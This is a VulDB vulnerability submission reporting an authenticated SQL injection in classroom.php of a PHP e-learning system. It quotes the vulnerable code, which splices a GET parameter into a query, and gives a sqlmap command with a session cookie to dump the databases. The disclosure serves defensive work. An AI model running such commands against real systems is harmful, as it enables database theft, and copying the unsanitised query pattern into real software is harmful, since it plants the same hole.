| Titolo | sql injection in Simple E-Learning System(authenticated) |
|---|
| Descrizione | the E-Learning System source code url: https://www.sourcecodester.com/php-simple-e-learning-system-source-code
in classroom.php line 42:
code as below
if (isset($_GET['post_id'])) {
$post_id = $_GET['post_id'];
$data_query = mysqli_query($con, "SELECT body FROM posts WHERE id='$post_id'");
$body = mysqli_fetch_array($data_query);
the post_id is directly spliced into the sql query statement,and the $body is directly echo in line 156
so there is a obvious sql injection, you just need a authenticated user。we can use sqlmap to exploit it .Command as below, and the cookie as your own user
python .\sqlmap.py -u "http://127.0.0.1/vcs/classRoom.php?post_id=1&classCode=class101_a" --cookie="PHPSESSID=12blsndrn1t8gcphdj864gbrcu" --dbs |
|---|
| Fonte | ⚠️ https://www.sourcecodester.com/php-simple-e-learning-system-source-code |
|---|
| Utente | wuerror (UID 30660) |
|---|
| Sottomissione | 05/08/2022 05:01 (4 anni fa) |
|---|
| Moderazione | 05/08/2022 07:13 (2 hours later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 205615 [SourceCodester Simple E-Learning System classroom.php post_id iniezione SQL] |
|---|
| Punti | 17 |
|---|